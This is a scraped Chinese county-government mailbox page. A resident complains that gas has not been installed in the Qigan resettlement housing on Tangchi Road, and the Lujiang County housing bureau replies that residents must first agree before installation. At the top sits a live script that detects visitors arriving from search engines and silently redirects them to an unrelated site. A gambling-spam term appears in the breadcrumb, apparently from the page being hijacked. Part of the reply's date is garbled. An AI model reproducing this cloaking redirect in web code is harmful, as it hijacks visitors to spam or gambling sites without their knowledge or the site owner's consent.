var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 书记信箱

来信信息
信件编号: 09245115209302
来信标题: 汤池路7号旗杆村民组1幢安置房燃气一直没有安装。
来信时间: 2019-12-23
来信内容:
县长您好,我是旗杆安置房的村民,我们这边安置房里的人都很想装燃气,但是燃气公司不给安装。我们一直使用液化气很不安全,这里居住的大都是老人和妇女很大年龄都自己去充液化气然后抬着上楼,很是吃力,一不小心就会从楼上摔下来。特别是从一楼抬到六楼老年人真的好可怜,妇女就更难了,希望县长给予帮助
回复内容
答复单位: 庐江县住房和城乡建设局
办理时间: 2020-01-09
回复内容:

尊敬的方女士:

    您好!您在县政府书记信箱中的来信我局已收悉,经局负责人批示,由我局城建科谈帮明予以调查处理,现将处理情况回复如下:

经调查了解,方女士反映的旗杆安置房1#楼位于汤池路与塔山路交口,塔山路改造施工时川东公司已为该楼栋预留了燃气支管方便后期接气使用,由于燃气管道安装涉及到楼栋周边绿化和道路破挖,且燃气入户管需沿厨房外墙爬设,需要小区用户达成统一意见。目前,小区业主代表已在牵头征询该楼栋住户天然气安装意见,意见统一后拟报社居委后组织安装。

202019下午305分我局城建科工作人员吴子兵同志通过电话向您说明了相关情况,您表示满意。

感谢您对我们工作的理解和支持。


                                                                              庐江县住房和城乡建设局

                            2020年1月9

 


留言评价
查询密码:
评价结果: